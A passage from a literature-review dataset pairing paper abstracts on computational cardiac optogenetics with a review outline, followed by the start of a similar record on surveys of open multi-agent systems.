field of cardiology. --- paper_title: Shedding light onto live molecular targets paper_content: Optical sensing of specific molecular targets and pathways deep inside living mice has become possible as a result of a number of advances. These include design of biocompatible near-infrared fluorochromes, development of targeted and activatable 'smart' imaging probes, engineered photoproteins and advances in photon migration theory and reconstruction. Together, these advances will provide new tools making it possible to understand more fully the functioning of protein networks, diagnose disease earlier and speed along drug discovery. --- paper_title: ReaChR: a red-shifted variant of channelrhodopsin enables deep transcranial optogenetic excitation paper_content: Channelrhodopsins (ChRs) are used to optogenetically depolarize neurons. We engineered a variant of ChR, denoted red-activatable ChR (ReaChR), that is optimally excited with orange to red light (λ ∼590-630 nm) and offers improved membrane trafficking, higher photocurrents and faster kinetics compared to existing red-shifted ChRs. Red light is less scattered by tissue and is absorbed less by blood than the blue to green wavelengths that are required by other ChR variants. We used ReaChR expressed in the vibrissa motor cortex to drive spiking and vibrissa motion in awake mice when excited with red light through intact skull. Precise vibrissa movements were evoked by expressing ReaChR in the facial motor nucleus in the brainstem and illumination with red light through the external auditory canal. Thus, ReaChR enables transcranial optical activation of neurons in deep brain structures without the need to surgically thin the skull, form a transcranial window or implant optical fibers. --- paper_title: Optogenetic versus Electrical Stimulation of Human Cardiomyocytes: Modeling Insights. paper_content: Optogenetics provides an alternative to electrical stimulation to manipulate membrane voltage, and trigger or modify action potentials (APs) in excitable cells. We compare biophysically and energetically the cellular responses to direct electrical current injection versus optical stimulation mediated by genetically expressed light-sensitive ion channels, e.g., Channelrhodopsin-2 (ChR2). Using a computational model of ChR2(H134R mutant), we show that both stimulation modalities produce similar-in-morphology APs in human cardiomyocytes, and that electrical and optical excitability vary with cell type in a similar fashion. However, whereas the strength-duration curves for electrical excitation in ventricular and atrial cardiomyocytes closely follow the theoretical exponential relationship for an equivalent RC circuit, the respective optical strength-duration curves significantly deviate, exhibiting higher nonlinearity. We trace the origin of this deviation to the waveform of the excitatory current—a nonrectangular self-terminating inward current produced in optical stimulation due to ChR2 kinetics and voltage-dependent rectification. Using a unifying charge measure to compare energy needed for electrical and optical stimulation, we reveal that direct electrical current injection (rectangular pulse) is more efficient at short pulses, whereas voltage-mediated negative feedback leads to self-termination of ChR2 current and renders optical stimulation more efficient for long low-intensity pulses. This applies to cardiomyocytes but not to neuronal cells (with much shorter APs). Furthermore, we demonstrate the cell-specific use of ChR2 current as a unique modulator of intrinsic activity, allowing for optical control of AP duration in atrial and, to a lesser degree, in ventricular myocytes. For self-oscillatory cells, such as Purkinje, constant light at extremely low irradiance can be used for fine control of oscillatory frequency, whereas constant electrical stimulation is not feasible due to electrochemical limitations. Our analysis offers insights for designing future new energy-efficient stimulation strategies in heart or brain. --- paper_title: Independent optical excitation of distinct neural populations paper_content: Sequencing the transcriptomes of more than 100 species of alga yields new channelrhodopsins with promising properties for optogenetics. A far red–shifted channelrhodopsin, Chrimson, opens up new behavioral capabilities in Drosophila, and alongside a fast yet light-sensitive blue channelrhodopsin, Chronos, enables independent excitation of two neuronal populations in brain slices. --- paper_title: Quantifying spatial localization of optical mapping using Monte Carlo simulations paper_content: Optical mapping techniques used to study spatial distributions of cardiac activity can be divided into two categories; (1) broad-field excitation method, in which hearts stained with voltage or calcium sensitive dyes are illuminated with broad-field excitation light and fluorescence is collected by image or photodiode arrays; (2) laser scanning method, in which illumination uses a scanning laser and fluorescence is collected with a photomultiplier tube. The spatial localization of the fluorescence signal for these two methods is unknown and may depend upon light absorption and scattering at both excitation and emission wavelengths. We measured the absorption coefficients (/spl mu//sub a/), scattering coefficients (/spl mu//sub s/), and scattering anisotropy coefficients (g) at representative excitation and emission wavelengths in rabbit heart tissue stained with di-4-ANEPPS or co-stained with both Rh237 and Oregon Green 488 BAPTA 1. Monte Carlo models were then used to simulate absorption and scattering of excitation light and fluorescence emission light for both broad-field and laser methods in three-dimensional tissue. Contributions of local emissions throughout the tissue to fluorescence collected from the tissue surface were determined for both methods. Our results show that spatial localization depends on the light absorption and scattering in tissue and on the optical mapping method that is used. A tissue region larger than the laser beam or collecting area of the array element contributes to the optical recordings. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Alternans and spiral breakup in human ventricular tissue model paper_content: Ventricular fibrillation (VF) is one of the main causes of death in the Western world. According to one hypothesis, the chaotic excitation dynamics during VF are the result of dynamical instabilities in action potential duration (APD) the occurrence of which requires that the slope of the APD restitution curve exceeds 1. Other factors such as electrotonic coupling and cardiac memory also determine whether these instabilities can develop. In this paper we study the conditions for alternans and spiral breakup in human cardiac tissue. Therefore, we develop a new version of our human ventricular cell model, which is based on recent experimental measurements of human APD restitution and includes a more extensive description of intracellular calcium dynamics. We apply this model to study the conditions for electrical instability in single cells, for reentrant waves in a ring of cells, and for reentry in two-dimensional sheets of ventricular tissue. We show that an important determinant for the onset of instability is the recovery dynamics of the fast sodium current. Slower sodium current recovery leads to longer periods of spiral wave rotation and more gradual conduction velocity restitution, both of which suppress restitution-mediated instability. As a result, maximum restitution slopes considerably exceeding 1 (up to 1.5) may be necessary for electrical instability to occur. Although slopes necessary for the onset of instabilities found in our study exceed 1, they are within the range of experimentally measured slopes. Therefore, we conclude that steep APD restitution-mediated instability is a potential mechanism for VF in the human heart. --- paper_title: Ionic mechanisms underlying human atrial action potential properties: insights from a mathematical model paper_content: The mechanisms underlying many important properties of the human atrial action potential (AP) are poorly understood. Using specific formulations of the K + , Na + , and Ca 2+ currents based on data recorded from human atrial myocytes, along with representations of pump, exchange, and background currents, we developed a mathematical model of the AP. The model AP resembles APs recorded from human atrial samples and responds to rate changes, L-type Ca 2+ current blockade, Na + /Ca 2+ exchanger inhibition, and variations in transient outward current amplitude in a fashion similar to experimental recordings. Rate-dependent adaptation of AP duration, an important determinant of susceptibility to atrial fibrillation, was attributable to incomplete L-type Ca 2+ current recovery from inactivation and incomplete delayed rectifier current deactivation at rapid rates. Experimental observations of variable AP morphology could be accounted for by changes in transient outward current density, as suggested experimentally. We conclude that this mathematical model of the human atrial AP reproduces a variety of observed AP behaviors and provides insights into the mechanisms of clinically important AP properties. --- paper_title: A comprehensive multiscale framework for simulating optogenetics in the heart paper_content: Optogenetics has emerged as an alternative method for electrical control of the heart, where illumination is used to elicit a bioelectric response in tissue modified to express photosensitive proteins (opsins). This technology promises to enable evocation of spatiotemporally precise responses in targeted cells or tissues, thus creating new possibilities for safe and effective therapeutic approaches to ameliorate cardiac function. Here we present a comprehensive framework for multiscale modelling of cardiac optogenetics, allowing both mechanistic examination of optical control and exploration of potential therapeutic applications. The framework incorporates accurate representations of opsin channel kinetics and delivery modes, spatial distribution of photosensitive cells, and tissue illumination constraints, making possible the prediction of emergent behaviour resulting from interactions at sub-organ scales. We apply this framework to explore how optogenetic delivery characteristics determine energy requirements for optical stimulation and to identify cardiac structures that are potential pacemaking targets with low optical excitation thresholds. --- paper_title: Computational Optogenetics: A Novel Continuum Framework for the Photoelectrochemistry of Living Systems paper_content: Electrical stimulation is currently the gold standard treatment for heart rhythm disorders. However, electrical pacing is associated with technical limitations and unavoidable potential complications. Recent developments now enable the stimulation of mammalian cells with light using a novel technology known as optogenetics. The optical stimulation of genetically engineered cells has significantly changed our understanding of electrically excitable tissues, paving the way towards controlling heart rhythm disorders by means of photostimulation. Controlling these disorders, in turn, restores coordinated force generation to avoid sudden cardiac death. Here, we report a novel continuum framework for the photoelectrochemistry of living systems that allows us to decipher the mechanisms by which this technology regulates the electrical and mechanical function of the heart. Using a modular multiscale approach, we introduce a non-selective cation channel, channelrhodopsin-2, into a conventional cardiac muscle cell model via an additional photocurrent governed by a light-sensitive gating variable. Upon optical stimulation, this channel opens and allows sodium ions to enter the cell, inducing electrical activation. In side-by-side comparisons with conventional heart muscle cells, we show that photostimulation directly increases the sodium concentration, which indirectly decreases the potassium concentration in the cell, while all other characteristics of the cell remain virtually unchanged. We integrate our model cells into a continuum model for excitable tissue using a nonlinear parabolic second order partial differential equation, which we discretize in time using finite differences and in space using finite elements. To illustrate the potential of this computational model, we virtually inject our photosensitive cells into different locations of a human heart, and explore its activation sequences upon photostimulation. Our computational optogenetics tool box allows us to virtually probe landscapes of process parameters, and to identify optimal photostimulation sequences with the goal to pace human hearts with light and, ultimately, to restore mechanical function. --- paper_title: Mapping of cardiac electrical activation with electromechanical wave imaging: an in silico-in vivo reciprocity study. paper_content: BACKGROUND ::: Electromechanical wave imaging (EWI) is an entirely noninvasive, ultrasound-based imaging method capable of mapping the electromechanical activation sequence of the ventricles in vivo. Given the broad accessibility of ultrasound scanners in the clinic, the application of EWI could constitute a flexible surrogate for the 3-dimensional electrical activation. ::: ::: ::: OBJECTIVE ::: The purpose of this report is to reproduce the electromechanical wave (EW) using an anatomically realistic electromechanical model, and establish the capability of EWI to map the electrical activation sequence in vivo when pacing from different locations. ::: ::: ::: METHODS ::: EWI was performed in 1 canine during pacing from 3 different sites. A high-resolution dynamic model of coupled cardiac electromechanics of the canine heart was used to predict the experimentally recorded electromechanical wave. The simulated 3-dimensional electrical activation sequence was then compared with the experimental EW. ::: ::: ::: RESULTS ::: The electrical activation sequence and the EW were highly correlated for all pacing sites. The relationship between the electrical activation and the EW onset was found to be linear, with a slope of 1.01 to 1.17 for different pacing schemes and imaging angles. ::: ::: ::: CONCLUSION ::: The accurate reproduction of the EW in simulations indicates that the model framework is capable of accurately representing the cardiac electromechanics and thus testing new hypotheses. The one-to-one correspondence between the electrical activation and the EW sequences indicates that EWI could be used to map the cardiac electrical activity. This opens the door for further exploration of the technique in assisting in the early detection, diagnosis, and treatment monitoring of rhythm dysfunction. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: Purkinje-mediated Effects in the Response of Quiescent Ventricles to Defibrillation Shocks paper_content: In normal cardiac function, orderly activation of the heart is facilitated by the Purkinje system (PS), a specialized network of fast-conducting fibers that lines the ventricles. Its role during ventricular defibrillation remains unelucidated. Physical characteristics of the PS make it a poor candidate for direct electrical observation using contemporary experimental techniques. This study uses a computer modeling approach to assess contributions by the PS to the response to electrical stimulation. Normal sinus rhythm was simulated and epicardial breakthrough sites were distributed in a manner consistent with experimental results. Defibrillation shocks of several strengths and orientations were applied to quiescent ventricles, with and without PS, and electrical activation was analyzed. All shocks induced local polarizations in PS branches parallel to the field, which led to the rapid spread of excitation through the network. This produced early activations at myocardial sites where tissue was unexcited by the shock and coupled to the PS. Shocks along the apico-basal axis of the heart resulted in a significant abbreviation of activation time when the PS was present; these shocks are of particular interest because the fields generated by internal cardioverter defibrillators tend to have a strong component in the same direction. The extent of PS-induced changes, both temporal and spatial, was constrained by the amount of shock-activated myocardium. Increasing field strength decreased the transmission delay between PS and ventricular tissue at Purkinje-myocardial junctions (PMJs), but this did not have a major effect on the organ-level response. Weaker shocks directly affect a smaller volume of myocardial tissue but easily excite the PS, which makes the PS contribution to far field excitation more substantial than for stronger shocks. --- paper_title: Multiscale Computational Models for Optogenetic Control of Cardiac Function paper_content: The ability to stimulate mammalian cells with light has significantly changed our understanding of electrically excitable tissues in health and disease, paving the way toward various novel therapeutic applications. Here, we demonstrate the potential of optogenetic control in cardiac cells using a hybrid experimental/computational technique. Experimentally, we introduced channelrhodopsin-2 into undifferentiated human embryonic stem cells via a lentiviral vector, and sorted and expanded the genetically engineered cells. Via directed differentiation, we created channelrhodopsin-expressing cardiomyocytes, which we subjected to optical stimulation. To quantify the impact of photostimulation, we assessed electrical, biochemical, and mechanical signals using patch-clamping, multielectrode array recordings, and video microscopy. Computationally, we introduced channelrhodopsin-2 into a classic autorhythmic cardiac cell model via an additional photocurrent governed by a light-sensitive gating variable. Upon optical stimulation, the channel opens and allows sodium ions to enter the cell, inducing a fast upstroke of the transmembrane potential. We calibrated the channelrhodopsin-expressing cell model using single action potential readings for different photostimulation amplitudes, pulse widths, and frequencies. To illustrate the potential of the proposed approach, we virtually injected channelrhodopsin-expressing cells into different locations of a human heart, and explored its activation sequences upon optical stimulation. Our experimentally calibrated computational toolbox allows us to virtually probe landscapes of process parameters, and identify optimal photostimulation sequences toward pacing hearts with light. --- paper_title: Methodology for patient-specific modeling of atrial fibrosis as a substrate for atrial fibrillation. paper_content: Personalized computational cardiac models are emerging as an important tool for studying cardiac arrhythmia mechanisms, and have the potential to become powerful instruments for guiding clinical anti-arrhythmia therapy. In this article, we present the methodology for constructing a patient-specific model of atrial fibrosis as a substrate for atrial fibrillation. The model is constructed from high-resolution late gadolinium-enhanced magnetic resonance imaging (LGE-MRI) images acquired in vivo from a patient suffering from persistent atrial fibrillation, accurately capturing both the patient's atrial geometry and the distribution of the fibrotic regions in the atria. Atrial fiber orientation is estimated using a novel image-based method, and fibrosis is represented in the patient-specific fibrotic regions as incorporating collagenous septa, gap junction remodeling, and myofibroblast proliferation. A proof-of-concept simulation result of reentrant circuits underlying atrial fibrillation in the model of the patient's fibrotic atrium is presented to demonstrate the completion of methodology development. --- paper_title: Mechanistic inquiry into the role of tissue remodeling in fibrotic lesions in human atrial fibrillation. paper_content: Atrial fibrillation (AF), the most common arrhythmia in humans, is initiated when triggered activity from the pulmonary veins propagates into atrial tissue and degrades into reentrant activity. Although experimental and clinical findings show a correlation between atrial fibrosis and AF, the causal relationship between the two remains elusive. This study used an array of 3D computational models with different representations of fibrosis based on a patient-specific atrial geometry with accurate fibrotic distribution to determine the mechanisms by which fibrosis underlies the degradation of a pulmonary vein ectopic beat into AF. Fibrotic lesions in models were represented with combinations of: gap junction remodeling; collagen deposition; and myofibroblast proliferation with electrotonic or paracrine effects on neighboring myocytes. The study found that the occurrence of gap junction remodeling and the subsequent conduction slowing in the fibrotic lesions was a necessary but not sufficient condition for AF development, whereas myofibroblast proliferation and the subsequent electrophysiological effect on neighboring myocytes within the fibrotic lesions was the sufficient condition necessary for reentry formation. Collagen did not alter the arrhythmogenic outcome resulting from the other fibrosis components. Reentrant circuits formed throughout the noncontiguous fibrotic lesions, without anchoring to a specific fibrotic lesion. --- paper_title: ReaChR: a red-shifted variant of channelrhodopsin enables deep transcranial optogenetic excitation paper_content: Channelrhodopsins (ChRs) are used to optogenetically depolarize neurons. We engineered a variant of ChR, denoted red-activatable ChR (ReaChR), that is optimally excited with orange to red light (λ ∼590-630 nm) and offers improved membrane trafficking, higher photocurrents and faster kinetics compared to existing red-shifted ChRs. Red light is less scattered by tissue and is absorbed less by blood than the blue to green wavelengths that are required by other ChR variants. We used ReaChR expressed in the vibrissa motor cortex to drive spiking and vibrissa motion in awake mice when excited with red light through intact skull. Precise vibrissa movements were evoked by expressing ReaChR in the facial motor nucleus in the brainstem and illumination with red light through the external auditory canal. Thus, ReaChR enables transcranial optical activation of neurons in deep brain structures without the need to surgically thin the skull, form a transcranial window or implant optical fibers. --- paper_title: Optical mapping of optogenetically shaped cardiac action potentials paper_content: Light-mediated silencing and stimulation of cardiac excitability, an important complement to electrical stimulation, promises important discoveries and therapies. To date, cardiac optogenetics has been studied with patch-clamp, multielectrode arrays, video microscopy, and an all-optical system measuring calcium transients. The future lies in achieving simultaneous optical acquisition of excitability signals and optogenetic control, both with high spatio-temporal resolution. Here, we make progress by combining optical mapping of action potentials with concurrent activation of channelrhodopsin-2 (ChR2) or halorhodopsin (eNpHR3.0), via an all-optical system applied to monolayers of neonatal rat ventricular myocytes (NRVM). Additionally, we explore the capability of ChR2 and eNpHR3.0 to shape action-potential waveforms, potentially aiding the study of short/long QT syndromes that result from abnormal changes in action potential duration (APD). These results show the promise of an all-optical system to acquire action potentials with precise temporal optogenetics control, achieving a long-sought flexibility beyond the means of conventional electrical stimulation. --- paper_title: Independent optical excitation of distinct neural populations paper_content: Sequencing the transcriptomes of more than 100 species of alga yields new channelrhodopsins with promising properties for optogenetics. A far red–shifted channelrhodopsin, Chrimson, opens up new behavioral capabilities in Drosophila, and alongside a fast yet light-sensitive blue channelrhodopsin, Chronos, enables independent excitation of two neuronal populations in brain slices. --- paper_title: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation paper_content: Channelrhodopsin2 Current During the Action Potential: “Optical AP Clamp” and Approximation --- paper_title: Cardiac optogenetics paper_content: Optogenetics is an emerging technology for optical interrogation and control of biological function with high specificity and high spatiotemporal resolution. Mammalian cells and tissues can be sensitized to respond to light by a relatively simple and well-tolerated genetic modification using microbial opsins (light-gated ion channels and pumps). These can achieve fast and specific excitatory or inhibitory response, offering distinct advantages over traditional pharmacological or electrical means of perturbation. Since the first demonstrations of utility in mammalian cells (neurons) in 2005, optogenetics has spurred immense research activity and has inspired numerous applications for dissection of neural circuitry and understanding of brain function in health and disease, applications ranging from in vitro to work in behaving animals. Only recently (since 2010), the field has extended to cardiac applications with less than a dozen publications to date. In consideration of the early phase of work on cardiac optogenetics and the impact of the technique in understanding another excitable tissue, the brain, this review is largely a perspective of possibilities in the heart. It covers the basic principles of operation of light-sensitive ion channels and pumps, the available tools and ongoing efforts in optimizing them, overview of neuroscience use, as well as cardiac-specific questions of implementation and ideas for best use of this emerging technology in the heart. --- paper_title: Computational Optogenetics: Empirically-Derived Voltage- and Light-Sensitive Channelrhodopsin-2 Model paper_content: Channelrhodospin-2 (ChR2), a light-sensitive ion channel, and its variants have emerged as new excitatory optogenetic tools not only in neuroscience, but also in other areas, including cardiac electrophysiology. An accurate quantitative model of ChR2 is necessary for in silico prediction of the response to optical stimulation in realistic tissue/organ settings. Such a model can guide the rational design of new ion channel functionality tailored to different cell types/tissues. Focusing on one of the most widely used ChR2 mutants (H134R) with enhanced current, we collected a comprehensive experimental data set of the response of this ion channel to different irradiances and voltages, and used these data to develop a model of ChR2 with empirically-derived voltage- and irradiance- dependence, where parameters were fine-tuned via simulated annealing optimization. This ChR2 model offers: 1) accurate inward rectification in the current-voltage response across irradiances; 2) empirically-derived voltage- and light-dependent kinetics (activation, deactivation and recovery from inactivation); and 3) accurate amplitude and morphology of the response across voltage and irradiance settings. Temperature-scaling factors (Q10) were derived and model kinetics was adjusted to physiological temperatures. Using optical action potential clamp, we experimentally validated model-predicted ChR2 behavior in guinea pig ventricular myocytes. The model was then incorporated in a variety of cardiac myocytes, including human ventricular, atrial and Purkinje cell models. We demonstrate the ability of ChR2 to trigger action potentials in human cardiomyocytes at relatively low light levels, as well as the differential response of these cells to light, with the Purkinje cells being most easily excitable and ventricular cells requiring the highest irradiance at all pulse durations. This new experimentally-validated ChR2 model will facilitate virtual experimentation in neural and cardiac optogenetics at the cell and organ level and provide guidance for the development of in vivo tools. --- paper_title: KCNJ2 mutation in short QT syndrome 3 results in atrial fibrillation and ventricular proarrhythmia. paper_content: We describe a mutation (E299V) in KCNJ2, the gene that encodes the strong inward rectifier K(+) channel protein (Kir2.1), in an 11-y-old boy. The unique short QT syndrome type-3 phenotype is associated with an extremely abbreviated QT interval (200 ms) on ECG and paroxysmal atrial fibrillation. Genetic screening identified an A896T substitution in a highly conserved region of KCNJ2 that resulted in a de novo mutation E299V. Whole-cell patch-clamp experiments showed that E299V presents an abnormally large outward IK1 at potentials above -55 mV (P < 0.001 versus wild type) due to a lack of inward rectification. Coexpression of wild-type and mutant channels to mimic the heterozygous condition still resulted in a large outward current. Coimmunoprecipitation and kinetic analysis showed that E299V and wild-type isoforms may heteromerize and that their interaction impairs function. The homomeric assembly of E299V mutant proteins actually results in gain of function. Computer simulations of ventricular excitation and propagation using both the homozygous and heterozygous conditions at three different levels of integration (single cell, 2D, and 3D) accurately reproduced the electrocardiographic phenotype of the proband, including an exceedingly short QT interval with merging of the QRS and the T wave, absence of ST segment, and peaked T waves. Numerical experiments predict that, in addition to the short QT interval, absence of inward rectification in the E299V mutation should result in atrial fibrillation. In addition, as predicted by simulations using a geometrically accurate three-dimensional ventricular model that included the His-Purkinje network, a slight reduction in ventricular excitability via 20% reduction of the sodium current should increase vulnerability to life-threatening ventricular tachyarrhythmia. --- paper_title: Optogenetics-enabled dynamic modulation of action potential duration in atrial tissue: feasibility of a novel therapeutic approach. paper_content: AIMS ::: Diseases that abbreviate the cardiac action potential (AP) by increasing the strength of repolarizing transmembrane currents are highly arrhythmogenic. It has been proposed that optogenetic tools could be used to restore normal AP duration (APD) in the heart under such disease conditions. This study aims to evaluate the efficacy of an optogenetic treatment modality for prolonging pathologically shortened APs in a detailed computational model of short QT syndrome (SQTS) in the human atria, and compare it to drug treatment. ::: ::: ::: METHODS AND RESULTS ::: We used a human atrial myocyte model with faster repolarization caused by SQTS; light sensitivity was inscribed via the presence of channelrhodopsin-2 (ChR2). We conducted simulations in single cells and in a magnetic resonance imaging-based model of the human left atrium (LA). Application of an appropriate optical stimulus to a diseased cell dynamically increased APD, producing an excellent match to control AP (<1.5 mV deviation); treatment of a diseased cell with an AP-prolonging drug (chloroquine) also increased APD, but the match to control AP was worse (>5 mV deviation). Under idealized conditions in the LA (uniform ChR2-expressing cell distribution, no light attenuation), optogenetics-based therapy outperformed chloroquine treatment (APD increased to 87% and 81% of control). However, when non-uniform ChR2-expressing cell distribution and light attenuation were incorporated, optogenetics-based treatment was less effective (APD only increased to 55%). ::: ::: ::: CONCLUSION ::: This study demonstrates proof of concept for optogenetics-based treatment of diseases that alter atrial AP shape. We identified key practical obstacles intrinsic to the optogenetic approach that must be overcome before such treatments can be realized. ---
Title: Computational modeling of cardiac optogenetics: Methodology overview & review of findings from simulations Section 1: Introduction Description 1: Introduce the field of cardiac optogenetics, discuss the potential of low-energy light for electrophysiological control, and outline the aim of the review. Section 2: Modeling cardiac optogenetics at the protein scale Description 2: Discuss the steps towards multiscale simulation at the protein level, focusing on the electrophysiological behavior of opsins, especially channelrhodopsin-2 (ChR2). Section 3: Modeling cardiac optogenetics at the myocyte scale Description 3: Describe modeling efforts at the myocyte level, including direct expression of opsins in cardiac myocytes and electrical coupling of opsin-rich donor cells to myocytes. Section 4: Modeling cardiac optogenetics at the tissue scale Description 4: Explain the incorporation of realistic spatial patterns of opsin-expressing cells at the tissue level, highlighting the significance of heterogeneous patterns. Section 5: Modeling cardiac optogenetics at the organ scale Description 5: Outline the steps needed to simulate the dynamics of excitation and contraction in biophysically-detailed models of the heart, including representation of optical stimuli and light-tissue interactions. Section 6: Effects of cardiac cell type on energy required for optogenetics-based stimulation Description 6: Discuss how different cardiac cell types impact the energy required for optical stimulation, considering variations in action potential properties and membrane currents. Section 7: Optogenetics-based cardiac pacing Description 7: Investigate factors influencing optogenetics-based cardiac pacing, including multicellular and coupling effects, optical irradiance thresholds, and spatial distribution of light-sensitive cells. Section 8: Dynamic modulation of atrial action potential duration (APD) Description 8: Explore the potential of optogenetics to modulate action potential duration, highlighting potential therapeutic applications and limitations observed in simulations. Section 9: Conclusions Description 9: Summarize the main findings of cardiac optogenetics modeling, stressing its potential to advance light-based therapies and guide the development of new optogenetic tools for cardiac applications. Section 10: Conflicts of interest statements Description 10: Declare any potential conflicts of interest the authors may have regarding the work presented in the review.
Specifying open agent systems: A survey
10
--- paper_title: Open Multi-Agent Systems: Agent Communication and Integration paper_content: In this paper, we study the open-ended nature of multi-agent systems, which refers to the property of allowing the dynamic integration of new agents into an existing system. In particular, the focus of this study is on the issues of agent communication and integration. We define an abstract programming language for open multi-agent systems that is based on concepts and mechanisms as introduced and studied in concurrency theory. Moreover, an important ingredient is the generalisation of the traditional concept of value-passing to a communication mechanism that allows for the exchange of information. Additionally, an operational model for the language is given in terms of a transition system, which allows the formal derivation of computations. --- paper_title: A formal road from institutional norms to organizational structures paper_content: Up to now, the way institutions and organizations have been used in the development of open systems has not often gone further than a useful heuristics. In order to develop systems actually implementing institutions and organizations, formal methods should take the place of heuristic ones. The paper presents a formal semantics for the notion of institution and its components (abstract and concrete norms, empowerment of agents, roles) and defines a formal relation between institutions and organizational structures. As a result, it is shown how institutional norms can be refined to constructs---organizational structures---which are closer to an implemented system. It is also shown how such a refinement process can be fully formalized and it is therefore amenable to rigorous verification. --- paper_title: New Developments in Ontology-Based Policy Management: Increasing the Practicality and Comprehensiveness of KAoS paper_content: The KAoS policy management framework pioneered the use of semantically-rich ontological representation and reasoning to specify, analyze, deconflict, and enforce policies [9, 10]. The framework has continued to evolve over the last five years, inspired by both technological advances and the practical needs of its varied applications. In this paper, we describe how these applications have motivated the partitioning of components into a well-defined three-layer policy management architecture that hides ontology complexity from the human user and from the policy-governed system. The power of semantic reasoning is embedded in the middle layer of the architecture where it can provide the most benefit. We also describe how the policy semantics of the core KAoS policy ontology has grown in its comprehensiveness. The flexible and mature architecture of KAoS enables straightforward integration with a variety of deployment platforms, ranging from highly distributed systems, such as the AFRL information management system, to human-robotic interaction, to dynamic management of quality-of-service and cross-domain information management of wireless networks in resource-constrained or security-sensitive environments. --- paper_title: Amongst first-class protocols paper_content: The ubiquity of our increasingly distributed and complex computing environments have necessitated the development of programming approaches and paradigms that can automatically manage the numerous tasks and processes involved. Hence, research into agency and multi-agent systems are of more and more interest as an automation solution. Coordination becomes a central issue in these environments. The most promising approach is the use of interaction protocols. Interaction protocols specify the interaction or social norms for the participating agents. However the orthodoxy see protocols as rigid specifications that are defined a priori. A recent development in this field of research is the specification of protocols that are treated as first-class computational entities. This paper explores the most prominent approaches and compares them. --- paper_title: Open information systems semantics for distributed artificial intelligence paper_content: Abstract Distributed Artificial Intelligence (henceforth called DAI) deals with issues of large-scale Open Systems (i.e. systems which are always subject to unanticipated outcomes in their operation and which can receive new information from outside themselves at any time). Open Information Systems (henceforth called OIS) are Open Systems that are implemented using digital storage, operations, and communications technology. OIS Semantics aims to provide a scientific foundation for understanding such large-scale OIS projects and for developing new technology. The literature of DAI speaks of many important concepts such as commitment, conflict, negotiation, cooperation, distributed problem solving, representation , etc. However there is currently no framework for comparing the usage of such concepts in one publication with usage in other publications. Open Information System Semantics (henceforth called OIS Semantics) is a step toward remedying this problem by providing a framework which integrates methods from Sociology with methods from Concurrent Systems Science into a foundation that provides a framework for analyzing previous work in DAI and a powerful foundation for its further development. Deduction, one of the most powerful and well-understood methods for information systems, has recently been applied to foundational issues in DAI thereby raising important new issues and problems above and beyond those of applying deduction to the problems of classical AI. OIS Semantics provides answers to many important questions about the uses of deduction in OIS. It provides a characterization of Deduction that encompasses N th-Order Logics, Meta-theories, Modal Logics, Circumscription, Default Logic, Autoepistemic Logic, Restricted Scope Nonmonotonic Logics, etc. OIS Semantics develops the concept of Deductive Indecision as a fundamental aspect of Deductive systems, thereby characterizing the scope and limits of Deduction for operational and representational activities in OIS. Negotiations play a fundamental role in OIS Semantics. They are creative processes that go beyond the capabilities of Deduction. OIS Semantics characterizes the role of Negotiation as a powerful method for increasing understanding of large-scale OIS projects. The ambitious goal of OIS Semantics for DAI is to provide an integrated foundation for Sociology and Concurrent Systems Science. This paper provides a snapshot of where we currently stand in the process of developing these foundations --- paper_title: Agent communication languages: rethinking the principles paper_content: Agent communication languages have been used for years in proprietary multiagent systems. Yet agents from different vendors-or even different research projects-cannot communicate with each other. The author looks at the underlying reasons and proposes a conceptual shift from individual agent representations to social interaction. --- paper_title: The Deontic Component of Action Language n C+ paper_content: The action language ${\mathcal{C}}+$ of Giunchiglia, Lee, Lifschitz, McCain, and Turner is a formalism for 